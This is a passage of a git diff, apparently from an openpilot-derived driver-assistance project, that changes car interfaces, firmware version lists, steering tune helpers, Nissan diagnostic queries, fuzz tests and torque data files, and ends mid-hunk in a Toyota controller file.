a/selfdrive/car/isotp_parallel_query.py b/selfdrive/car/isotp_parallel_query.py index 8ab9728e5..93033126a 100644 --- a/selfdrive/car/isotp_parallel_query.py +++ b/selfdrive/car/isotp_parallel_query.py @@ -115,7 +115,13 @@ class IsoTpParallelQuery: addrs_responded.add(tx_addr) response_timeouts[tx_addr] = time.monotonic() + timeout - if not dat: + if dat is None: + continue + + # Log unexpected empty responses + if len(dat) == 0: + cloudlog.error(f"iso-tp query empty response: {tx_addr}") + request_done[tx_addr] = True continue counter = request_counter[tx_addr] diff --git a/selfdrive/car/lat_controller_helper.py b/selfdrive/car/lat_controller_helper.py deleted file mode 100644 index f40710def..000000000 --- a/selfdrive/car/lat_controller_helper.py +++ /dev/null @@ -1,225 +0,0 @@ -''' - -dp - we create a separate controller helper to restore PID/LQR steering tune. -''' - -from selfdrive.car.tunes import set_lat_tune, LatTunes -from selfdrive.car.toyota.values import CAR as TOYOTA -from selfdrive.car.hyundai.values import CAR as HYUNDAI -from selfdrive.car.volkswagen.values import CAR as VW -from selfdrive.car.subaru.values import CAR as SUBARU - -from common.params import Params - -def configure_pid_tune(candidate, tune): - # toyota - if candidate == TOYOTA.PRIUS: - # indi only - pass - elif candidate == TOYOTA.PRIUS_V: - # lqr only - pass - elif candidate in (TOYOTA.RAV4, TOYOTA.RAV4H): - # lqr only - pass - elif candidate == TOYOTA.COROLLA: - set_lat_tune(tune, LatTunes.PID_A) - elif candidate in (TOYOTA.LEXUS_RX, TOYOTA.LEXUS_RXH, TOYOTA.LEXUS_RX_TSS2, TOYOTA.LEXUS_RXH_TSS2): - set_lat_tune(tune, LatTunes.PID_C) - elif candidate in (TOYOTA.CHR, TOYOTA.CHRH, TOYOTA.CHR_TSS2): - set_lat_tune(tune, LatTunes.PID_F) - elif candidate in (TOYOTA.CAMRY, TOYOTA.CAMRYH, TOYOTA.CAMRY_TSS2, TOYOTA.CAMRYH_TSS2): - if candidate not in (TOYOTA.CAMRY_TSS2, TOYOTA.CAMRYH_TSS2): - set_lat_tune(tune, LatTunes.PID_C) - elif candidate in (TOYOTA.HIGHLANDER, TOYOTA.HIGHLANDERH, TOYOTA.HIGHLANDER_TSS2, TOYOTA.HIGHLANDERH_TSS2): - set_lat_tune(tune, LatTunes.PID_G) - elif candidate in (TOYOTA.AVALON, TOYOTA.AVALON_2019, TOYOTA.AVALONH_2019, TOYOTA.AVALON_TSS2, TOYOTA.AVALONH_TSS2): - set_lat_tune(tune, LatTunes.PID_H) - elif candidate in (TOYOTA.RAV4_TSS2, TOYOTA.RAV4_TSS2_2022, TOYOTA.RAV4H_TSS2, TOYOTA.RAV4H_TSS2_2022): - # 2019+ RAV4 TSS2 uses two different steering racks and specific tuning seems to be necessary. - if Params().get_bool("dp_toyota_rav4_tss2_tune"): - set_lat_tune(tune, LatTunes.PID_I) - else: - set_lat_tune(tune, LatTunes.PID_D) - elif candidate in (TOYOTA.COROLLA_TSS2, TOYOTA.COROLLAH_TSS2): - set_lat_tune(tune, LatTunes.PID_D) - elif candidate in (TOYOTA.LEXUS_ES_TSS2, TOYOTA.LEXUS_ESH_TSS2, TOYOTA.LEXUS_ESH): - set_lat_tune(tune, LatTunes.PID_D) - elif candidate == TOYOTA.SIENNA: - set_lat_tune(tune, LatTunes.PID_J) - elif candidate in (TOYOTA.LEXUS_IS, TOYOTA.LEXUS_RC): - set_lat_tune(tune, LatTunes.PID_L) - elif candidate == TOYOTA.LEXUS_CTH: - set_lat_tune(tune, LatTunes.PID_M) - elif candidate in (TOYOTA.LEXUS_NX, TOYOTA.LEXUS_NXH, TOYOTA.LEXUS_NX_TSS2, TOYOTA.LEXUS_NXH_TSS2): - set_lat_tune(tune, LatTunes.PID_C) - elif candidate == TOYOTA.PRIUS_TSS2: - set_lat_tune(tune, LatTunes.PID_N) - elif candidate == TOYOTA.MIRAI: - set_lat_tune(tune, LatTunes.PID_C) - elif candidate in (TOYOTA.ALPHARD_TSS2, TOYOTA.ALPHARDH_TSS2): - set_lat_tune(tune, LatTunes.PID_J) - - # hyundai - elif candidate in (HYUNDAI.SANTA_FE, HYUNDAI.SANTA_FE_2022, HYUNDAI.SANTA_FE_HEV_2022, HYUNDAI.SANTA_FE_PHEV_2022): - set_lat_tune(tune, LatTunes.PID_HYUNDAI_D) - elif candidate in (HYUNDAI.SONATA, HYUNDAI.SONATA_HYBRID): - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.SONATA_LF: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.PALISADE: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_C) - elif candidate == HYUNDAI.ELANTRA: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_B) - elif candidate == HYUNDAI.ELANTRA_2021: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.ELANTRA_HEV_2021: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.HYUNDAI_GENESIS: - # indi only - pass - elif candidate in (HYUNDAI.KONA, HYUNDAI.KONA_EV, HYUNDAI.KONA_HEV): - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate in (HYUNDAI.IONIQ, HYUNDAI.IONIQ_EV_LTD, HYUNDAI.IONIQ_EV_2020, HYUNDAI.IONIQ_PHEV, HYUNDAI.IONIQ_HEV_2022): - set_lat_tune(tune, LatTunes.PID_HYUNDAI_B) - elif candidate == HYUNDAI.IONIQ_PHEV_2019: - # indi only - pass - elif candidate == HYUNDAI.VELOSTER: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - - # Kia - elif candidate == HYUNDAI.KIA_SORENTO: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate in (HYUNDAI.KIA_NIRO_EV, HYUNDAI.KIA_NIRO_HEV_2021): - set_lat_tune(tune, LatTunes.PID_HYUNDAI_B) - elif candidate == HYUNDAI.KIA_SELTOS: - # indi only - pass - elif candidate == HYUNDAI.KIA_OPTIMA_H: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.KIA_STINGER: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.KIA_FORTE: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.KIA_CEED: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - elif candidate == HYUNDAI.KIA_K5_2021: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_A) - - # Genesis - elif candidate == HYUNDAI.GENESIS_G70: - # indi only - pass - elif candidate == HYUNDAI.GENESIS_G70_2020: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_E) - elif candidate == HYUNDAI.GENESIS_G80: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_F) - elif candidate == HYUNDAI.GENESIS_G90: - set_lat_tune(tune, LatTunes.PID_HYUNDAI_G) - - # VW - elif candidate == VW.ARTEON_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.ATLAS_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.GOLF_MK7: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.JETTA_MK7: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.PASSAT_MK8: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.PASSAT_NMS: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.POLO_MK6: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SHARAN_MK2: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.TAOS_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.TCROSS_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.TIGUAN_MK2: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.TOURAN_MK2: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.TRANSPORTER_T61: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.TROC_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.AUDI_A3_MK3: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.AUDI_Q2_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.AUDI_Q3_MK2: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SEAT_ATECA_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SEAT_LEON_MK3: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SKODA_KAMIQ_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SKODA_KAROQ_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SKODA_KODIAQ_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SKODA_OCTAVIA_MK3: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SKODA_SCALA_MK1: - set_lat_tune(tune, LatTunes.PID_VW) - elif candidate == VW.SKODA_SUPERB_MK3: - set_lat_tune(tune, LatTunes.PID_VW) - - # subaru - elif candidate == SUBARU.ASCENT: - set_lat_tune(tune, LatTunes.PID_SUBARU_A) - elif candidate == SUBARU.IMPREZA: - set_lat_tune(tune, LatTunes.PID_SUBARU_B) - elif candidate == SUBARU.IMPREZA_2020: - set_lat_tune(tune, LatTunes.PID_SUBARU_C) - elif candidate == SUBARU.FORESTER: - set_lat_tune(tune, LatTunes.PID_SUBARU_D) - elif candidate in (SUBARU.OUTBACK, SUBARU.LEGACY): - # torque only - pass - elif candidate in (SUBARU.FORESTER_PREGLOBAL, SUBARU.OUTBACK_PREGLOBAL_2018): - set_lat_tune(tune, LatTunes.PID_SUBARU_E) - elif candidate == SUBARU.LEGACY_PREGLOBAL: - set_lat_tune(tune, LatTunes.PID_SUBARU_F) - elif candidate == SUBARU.OUTBACK_PREGLOBAL: - set_lat_tune(tune, LatTunes.PID_SUBARU_E) - - -''' -from RAV4 -''' -def configure_lqr_tune(candidate, tune): - tune.init('lqr') - tune.lqr.scale = 1500.0 - tune.lqr.ki = 0.05 - - tune.lqr.a = [0., 1., -0.22619643, 1.21822268] - tune.lqr.b = [-1.92006585e-04, 3.95603032e-05] - tune.lqr.c = [1., 0.] - tune.lqr.k = [-110.73572306, 451.22718255] - tune.lqr.l = [0.3233671, 0.3185757] - tune.lqr.dcGain = 0.002237852961363602 - -# ''' -# directly copy from CarInterface.configure_torque_tune -# ''' -# def config_torque_tune(candidate, tune, steering_angle_deadzone_deg=0.0, use_steering_angle=True): -# try: -# params = get_torque_params(candidate) -# -# tune.init('torque') -# tune.torque.useSteeringAngle = use_steering_angle -# tune.torque.kp = 1.0 -# tune.torque.kf = 1.0 -# tune.torque.ki = 0.1 -# tune.torque.friction = params['FRICTION'] -# tune.torque.latAccelFactor = params['LAT_ACCEL_FACTOR'] -# tune.torque.latAccelOffset = 0.0 -# tune.torque.steeringAngleDeadzoneDeg = steering_angle_deadzone_deg -# except: -# pass diff --git a/selfdrive/car/mazda/interface.py b/selfdrive/car/mazda/interface.py index da8d8c31c..443116bc1 100755 --- a/selfdrive/car/mazda/interface.py +++ b/selfdrive/car/mazda/interface.py @@ -4,7 +4,6 @@ from common.conversions import Conversions as CV from selfdrive.car.mazda.values import CAR, LKAS_LIMITS from selfdrive.car import STD_CARGO_KG, scale_tire_stiffness, get_safety_config from selfdrive.car.interfaces import CarInterfaceBase -from common.params import Params ButtonType = car.CarState.ButtonEvent.Type EventName = car.CarEvent.EventName @@ -17,7 +16,7 @@ class CarInterface(CarInterfaceBase): ret.safetyConfigs = [get_safety_config(car.CarParams.SafetyModel.mazda)] ret.radarUnavailable = True - ret.dashcamOnly = candidate not in (CAR.CX5_2022, CAR.CX9_2021) and not Params().get_bool('dp_mazda_dashcam_bypass') + ret.dashcamOnly = candidate not in (CAR.CX5_2022, CAR.CX9_2021) ret.steerActuatorDelay = 0.1 ret.steerLimitTimer = 0.8 @@ -45,9 +44,6 @@ class CarInterface(CarInterfaceBase): if candidate not in (CAR.CX5_2022, ): ret.minSteerSpeed = LKAS_LIMITS.DISABLE_SPEED * CV.KPH_TO_MS - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - ret.centerToFront = ret.wheelbase * 0.41 # TODO: start from empirically derived lateral slip stiffness for the civic and scale by @@ -66,7 +62,7 @@ class CarInterface(CarInterfaceBase): if self.CS.lkas_disabled: events.add(EventName.lkasDisabled) - elif self.dragonconf.dpMazdaSteerAlert and self.CS.low_speed_alert: + elif self.CS.low_speed_alert: events.add(EventName.belowSteerSpeed) ret.events = events.to_msg() diff --git a/selfdrive/car/mazda/values.py b/selfdrive/car/mazda/values.py index 3f75b21b8..71fd9f186 100644 --- a/selfdrive/car/mazda/values.py +++ b/selfdrive/car/mazda/values.py @@ -88,6 +88,7 @@ FW_VERSIONS = { (Ecu.engine, 0x7e0, None): [ b'PX2G-188K2-H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PX2H-188K2-H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'PX85-188K2-E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'SH54-188K2-D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXFG-188K2-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], @@ -100,10 +101,12 @@ FW_VERSIONS = { (Ecu.fwdCamera, 0x706, None): [ b'GSH7-67XK2-S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'GSH7-67XK2-T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'GSH7-67XK2-U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], (Ecu.transmission, 0x7e1, None): [ b'PYB2-21PS1-H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'SH51-21PS1-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'PXDL-21PS1-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXFG-21PS1-A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], }, @@ -185,6 +188,7 @@ FW_VERSIONS = { (Ecu.engine, 0x7e0, None): [ b'PX23-188K2-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PX24-188K2-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'PXM4-188K2-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXN8-188K2-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXN8-188K2-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PYD7-188K2-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', @@ -209,10 +213,12 @@ FW_VERSIONS = { (Ecu.fwdCamera, 0x706, None): [ b'B61L-67XK2-P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'B61L-67XK2-V\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'GSH7-67XK2-J\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'GSH7-67XK2-K\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'TK80-67XK2-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], (Ecu.transmission, 0x7e1, None): [ + b'PXM4-21PS1-A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM7-21PS1-A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM7-21PS1-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PYFM-21PS1-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', diff --git a/selfdrive/car/nissan/interface.py b/selfdrive/car/nissan/interface.py index 9c60fac0a..573dff9f0 100644 --- a/selfdrive/car/nissan/interface.py +++ b/selfdrive/car/nissan/interface.py @@ -36,9 +36,6 @@ class CarInterface(CarInterfaceBase): ret.wheelbase = 2.824 ret.centerToFront = ret.wheelbase * 0.44 - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - return ret # returns a car.CarState diff --git a/selfdrive/car/nissan/values.py b/selfdrive/car/nissan/values.py index 1ba88ac7b..d4e10e11c 100644 --- a/selfdrive/car/nissan/values.py +++ b/selfdrive/car/nissan/values.py @@ -79,35 +79,25 @@ FINGERPRINTS = { ] } -NISSAN_DIAGNOSTIC_REQUEST_KWP = bytes([uds.SERVICE_TYPE.DIAGNOSTIC_SESSION_CONTROL]) -NISSAN_DIAGNOSTIC_RESPONSE_KWP = bytes([uds.SERVICE_TYPE.DIAGNOSTIC_SESSION_CONTROL + 0x40]) +NISSAN_DIAGNOSTIC_REQUEST_KWP = bytes([uds.SERVICE_TYPE.DIAGNOSTIC_SESSION_CONTROL, 0x81]) +NISSAN_DIAGNOSTIC_RESPONSE_KWP = bytes([uds.SERVICE_TYPE.DIAGNOSTIC_SESSION_CONTROL + 0x40, 0x81]) NISSAN_VERSION_REQUEST_KWP = b'\x21\x83' NISSAN_VERSION_RESPONSE_KWP = b'\x61\x83' NISSAN_RX_OFFSET = 0x20 -# Try diagnostic sessions: default, standby, extended, Nissan-specific -NISSAN_DIAGNOSTIC_SESSION_TYPES = (0x81, 0x89, 0x92, 0xc0) -NISSAN_DEFAULT_DIAGNOSTIC_SESSION_TYPE = 0xc0 - FW_QUERY_CONFIG = FwQueryConfig( requests=[ - *[ - Request( - [NISSAN_DIAGNOSTIC_REQUEST_KWP + bytes([subfunction]), NISSAN_VERSION_REQUEST_KWP], - [NISSAN_DIAGNOSTIC_RESPONSE_KWP + bytes([subfunction]), NISSAN_VERSION_RESPONSE_KWP], - logging=subfunction != NISSAN_DEFAULT_DIAGNOSTIC_SESSION_TYPE, - ) for subfunction in NISSAN_DIAGNOSTIC_SESSION_TYPES - ], - *[ - Request( - [NISSAN_DIAGNOSTIC_REQUEST_KWP + bytes([subfunction]), NISSAN_VERSION_REQUEST_KWP], - [NISSAN_DIAGNOSTIC_RESPONSE_KWP + bytes([subfunction]), NISSAN_VERSION_RESPONSE_KWP], - rx_offset=NISSAN_RX_OFFSET, - logging=subfunction != NISSAN_DEFAULT_DIAGNOSTIC_SESSION_TYPE, - ) for subfunction in NISSAN_DIAGNOSTIC_SESSION_TYPES - ], + Request( + [NISSAN_DIAGNOSTIC_REQUEST_KWP, NISSAN_VERSION_REQUEST_KWP], + [NISSAN_DIAGNOSTIC_RESPONSE_KWP, NISSAN_VERSION_RESPONSE_KWP], + ), + Request( + [NISSAN_DIAGNOSTIC_REQUEST_KWP, NISSAN_VERSION_REQUEST_KWP], + [NISSAN_DIAGNOSTIC_RESPONSE_KWP, NISSAN_VERSION_RESPONSE_KWP], + rx_offset=NISSAN_RX_OFFSET, + ), Request( [StdQueries.MANUFACTURER_SOFTWARE_VERSION_REQUEST], [StdQueries.MANUFACTURER_SOFTWARE_VERSION_RESPONSE], diff --git a/selfdrive/car/subaru/interface.py b/selfdrive/car/subaru/interface.py index 64315dc9d..f7698dbe7 100644 --- a/selfdrive/car/subaru/interface.py +++ b/selfdrive/car/subaru/interface.py @@ -4,7 +4,6 @@ from panda import Panda from selfdrive.car import STD_CARGO_KG, get_safety_config from selfdrive.car.interfaces import CarInterfaceBase from selfdrive.car.subaru.values import CAR, GLOBAL_GEN2, PREGLOBAL_CARS, SubaruFlags -from common.params import Params class CarInterface(CarInterfaceBase): @@ -106,9 +105,6 @@ class CarInterface(CarInterfaceBase): else: raise ValueError(f"unknown car: {candidate}") - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - Params().put("dp_lateral_steer_rate_cost", "0.7") return ret # returns a car.CarState diff --git a/selfdrive/car/subaru/values.py b/selfdrive/car/subaru/values.py index 03ae17602..0e3f2e8d0 100644 --- a/selfdrive/car/subaru/values.py +++ b/selfdrive/car/subaru/values.py @@ -1,11 +1,11 @@ from dataclasses import dataclass, field -from enum import IntFlag +from enum import Enum, IntFlag from typing import Dict, List, Union from cereal import car from panda.python import uds from selfdrive.car import dbc_dict -from selfdrive.car.docs_definitions import CarHarness, CarInfo, CarParts +from selfdrive.car.docs_definitions import CarFootnote, CarHarness, CarInfo, CarParts, Column from selfdrive.car.fw_query_definitions import FwQueryConfig, Request, StdQueries, p16 Ecu = car.CarParams.Ecu @@ -56,10 +56,17 @@ class CAR: OUTBACK_PREGLOBAL_2018 = "SUBARU OUTBACK 2018 - 2019" +class Footnote(Enum): + GLOBAL = CarFootnote( + "In the non-US market, openpilot requires the car to come equipped with EyeSight with Lane Keep Assistance.", + Column.PACKAGE) + + @dataclass class SubaruCarInfo(CarInfo): package: str = "EyeSight Driver Assistance" car_parts: CarParts = field(default_factory=CarParts.common([CarHarness.subaru_a])) + footnotes: List[Enum] = field(default_factory=lambda: [Footnote.GLOBAL]) CAR_INFO: Dict[str, Union[SubaruCarInfo, List[SubaruCarInfo]]] = { diff --git a/selfdrive/car/tests/test_car_interfaces.py b/selfdrive/car/tests/test_car_interfaces.py index a14e80c7f..005ea114f 100755 --- a/selfdrive/car/tests/test_car_interfaces.py +++ b/selfdrive/car/tests/test_car_interfaces.py @@ -7,30 +7,49 @@ import importlib from parameterized import parameterized from cereal import car +from common.realtime import DT_CTRL from selfdrive.car import gen_empty_fingerprint from selfdrive.car.car_helpers import interfaces -from selfdrive.car.fingerprints import _FINGERPRINTS as FINGERPRINTS, all_known_cars -from selfdrive.test.fuzzy_generation import FuzzyGenerator +from selfdrive.car.fingerprints import all_known_cars +from selfdrive.test.fuzzy_generation import DrawType, FuzzyGenerator + + +def get_fuzzy_car_interface_args(draw: DrawType) -> dict: + # Fuzzy CAN fingerprints and FW versions to test more states of the CarInterface + fingerprint_strategy = st.fixed_dictionaries({key: st.dictionaries(st.integers(min_value=0, max_value=0x800), + st.integers(min_value=0, max_value=64)) for key in + gen_empty_fingerprint()}) + + # just the most important fields + car_fw_strategy = st.lists(st.fixed_dictionaries({ + 'ecu': st.sampled_from(list(car.CarParams.Ecu.schema.enumerants.keys())), + # TODO: only use reasonable addrs for the paired ecu and brand/platform + 'address': st.integers(min_value=0, max_value=0x800), + })) + + params_strategy = st.fixed_dictionaries({ + 'fingerprints': fingerprint_strategy, + 'car_fw': car_fw_strategy, + 'experimental_long': st.booleans(), + }) + + params: dict = draw(params_strategy) + params['car_fw'] = [car.CarParams.CarFw(**fw) for fw in params['car_fw']] + return params class TestCarInterfaces(unittest.TestCase): - @parameterized.expand([(car,) for car in all_known_cars()]) + @parameterized.expand([(car,) for car in sorted(all_known_cars())]) @settings(max_examples=5) @given(data=st.data()) def test_car_interfaces(self, car_name, data): - if car_name in FINGERPRINTS: - fingerprint = FINGERPRINTS[car_name][0] - else: - fingerprint = {} - CarInterface, CarController, CarState = interfaces[car_name] - fingerprints = gen_empty_fingerprint() - fingerprints.update({k: fingerprint for k in fingerprints.keys()}) - car_fw = [] + args = get_fuzzy_car_interface_args(data.draw) - car_params = CarInterface.get_params(car_name, fingerprints, car_fw, experimental_long=False, docs=False) + car_params = CarInterface.get_params(car_name, args['fingerprints'], args['car_fw'], + experimental_long=args['experimental_long'], docs=False) car_interface = CarInterface(car_params, CarController, CarState) assert car_params assert car_interface @@ -61,20 +80,23 @@ class TestCarInterfaces(unittest.TestCase): elif tune.which() == 'indi': self.assertTrue(len(tune.indi.outerLoopGainV)) - cc_msg=FuzzyGenerator.get_random_msg(data.draw, car.CarControl, real_floats=True) + cc_msg = FuzzyGenerator.get_random_msg(data.draw, car.CarControl, real_floats=True) # Run car interface + now_nanos = 0 CC = car.CarControl.new_message(**cc_msg) for _ in range(10): car_interface.update(CC, []) - car_interface.apply(CC, 0) - car_interface.apply(CC, 0) + car_interface.apply(CC, now_nanos) + car_interface.apply(CC, now_nanos) + now_nanos += DT_CTRL * 1e9 # 10 ms CC = car.CarControl.new_message(**cc_msg) CC.enabled = True for _ in range(10): car_interface.update(CC, []) - car_interface.apply(CC, 0) - car_interface.apply(CC, 0) + car_interface.apply(CC, now_nanos) + car_interface.apply(CC, now_nanos) + now_nanos += DT_CTRL * 1e9 # 10ms # Test radar interface RadarInterface = importlib.import_module(f'selfdrive.car.{car_params.carName}.radar_interface').RadarInterface diff --git a/selfdrive/car/torque_data/override.yaml b/selfdrive/car/torque_data/override.yaml index 00dba96ab..62d39171f 100644 --- a/selfdrive/car/torque_data/override.yaml +++ b/selfdrive/car/torque_data/override.yaml @@ -19,6 +19,7 @@ TESLA AP2 MODEL S: [.nan, 2.5, .nan] FORD BRONCO SPORT 1ST GEN: [.nan, 1.5, .nan] FORD ESCAPE 4TH GEN: [.nan, 1.5, .nan] FORD EXPLORER 6TH GEN: [.nan, 1.5, .nan] +FORD F-150 14TH GEN: [.nan, 1.5, .nan] FORD FOCUS 4TH GEN: [.nan, 1.5, .nan] FORD MAVERICK 1ST GEN: [.nan, 1.5, .nan] ### @@ -47,6 +48,8 @@ KIA SORENTO 4TH GEN: [2.5, 2.5, 0.1] KIA NIRO HYBRID 2ND GEN: [2.42, 2.5, 0.12] KIA NIRO EV 2ND GEN: [2.05, 2.5, 0.14] GENESIS GV80 2023: [2.5, 2.5, 0.1] +KIA CARNIVAL 4TH GEN: [1.75, 1.75, 0.15] +GMC ACADIA DENALI 2018: [1.6, 1.6, 0.2] # Dashcam or fallback configured as ideal car mock: [10.0, 10, 0.0] diff --git a/selfdrive/car/torque_data/params.yaml b/selfdrive/car/torque_data/params.yaml index cb423e1d8..800507d91 100644 --- a/selfdrive/car/torque_data/params.yaml +++ b/selfdrive/car/torque_data/params.yaml @@ -10,7 +10,6 @@ CHRYSLER PACIFICA HYBRID 2017: [1.79422, 1.06831764583744, 0.116237] CHRYSLER PACIFICA HYBRID 2018: [2.08887, 1.2943025830995154, 0.114818] CHRYSLER PACIFICA HYBRID 2019: [1.90120, 1.1958788168371808, 0.131520] GENESIS G70 2018: [3.8520195946707947, 2.354697063349854, 0.06830285485626221] -GMC ACADIA DENALI 2018: [1.3181430320331884, 1.1853735340610179, 0.3450592280031644] HONDA ACCORD 2018: [1.7135052593468778, 0.3461280068322071, 0.21579936052863807] HONDA ACCORD HYBRID 2018: [1.6651615004829625, 0.30322180951193245, 0.2083000440586149] HONDA CIVIC (BOSCH) 2019: [1.691708637466905, 0.40132900729454185, 0.25460295304024094] diff --git a/selfdrive/car/torque_data/substitute.yaml b/selfdrive/car/torque_data/substitute.yaml index c77b13bad..d79dbe857 100644 --- a/selfdrive/car/torque_data/substitute.yaml +++ b/selfdrive/car/torque_data/substitute.yaml @@ -34,6 +34,7 @@ HYUNDAI KONA ELECTRIC 2022: HYUNDAI KONA ELECTRIC 2019 HYUNDAI IONIQ HYBRID 2017-2019: HYUNDAI IONIQ PLUG-IN HYBRID 2019 HYUNDAI IONIQ HYBRID 2020-2022: HYUNDAI IONIQ PLUG-IN HYBRID 2019 HYUNDAI IONIQ ELECTRIC 2020: HYUNDAI IONIQ PLUG-IN HYBRID 2019 +HYUNDAI IONIQ 6 2023: HYUNDAI IONIQ 5 2022 HYUNDAI ELANTRA 2017: HYUNDAI SONATA 2019 HYUNDAI ELANTRA HYBRID 2021: HYUNDAI SONATA 2020 HYUNDAI TUCSON 2019: HYUNDAI SANTA FE 2019 @@ -50,15 +51,12 @@ HONDA CR-V EU 2016: HONDA CR-V 2016 HONDA CIVIC SEDAN 1.6 DIESEL 2019: HONDA CIVIC (BOSCH) 2019 HONDA E 2020: HONDA CIVIC (BOSCH) 2019 HONDA ODYSSEY CHN 2019: HONDA ODYSSEY 2018 -HONDA ODYSSEY HYBRID CHN 2022: HONDA ODYSSEY 2018 -HONDA CR-V HYBRID 2019 w/ BSM: HONDA CR-V HYBRID 2019 BUICK LACROSSE 2017: CHEVROLET VOLT PREMIER 2017 BUICK REGAL ESSENCE 2018: CHEVROLET VOLT PREMIER 2017 CADILLAC ESCALADE ESV 2016: CHEVROLET VOLT PREMIER 2017 CADILLAC ATS Premium Performance 2018: CHEVROLET VOLT PREMIER 2017 CHEVROLET MALIBU PREMIER 2017: CHEVROLET VOLT PREMIER 2017 -CHEVROLET TRAILBLAZER 2022: CHEVROLET VOLT PREMIER 2017 HOLDEN ASTRA RS-V BK 2017: CHEVROLET VOLT PREMIER 2017 SKODA FABIA 4TH GEN: VOLKSWAGEN GOLF 7TH GEN diff --git a/selfdrive/car/toyota/carcontroller.py b/selfdrive/car/toyota/carcontroller.py index a784d0f24..57e0a6bff 100644 --- a/selfdrive/car/toyota/carcontroller.py +++ b/selfdrive/car/toyota/carcontroller.py @@ -26,7 +26,9 @@ MAX_USER_TORQUE = 500 # LTA limits # EPS ignores commands above this angle and causes PCS to fault MAX_STEER_ANGLE = 94.9461 # deg +MAX_DRIVER_TORQUE_ALLOWANCE = 150 # slightly above steering pressed allows some resistance when changing lanes +# rick - toyota auto lock / unlock GearShifter = car.CarState.GearShifter UNLOCK_CMD = b'\x40\x05\x30\x11\x00\x40\x00\x00' LOCK_CMD = b'\x40\x05\x30\x11\x00\x80\x00\x00' @@ -60,43 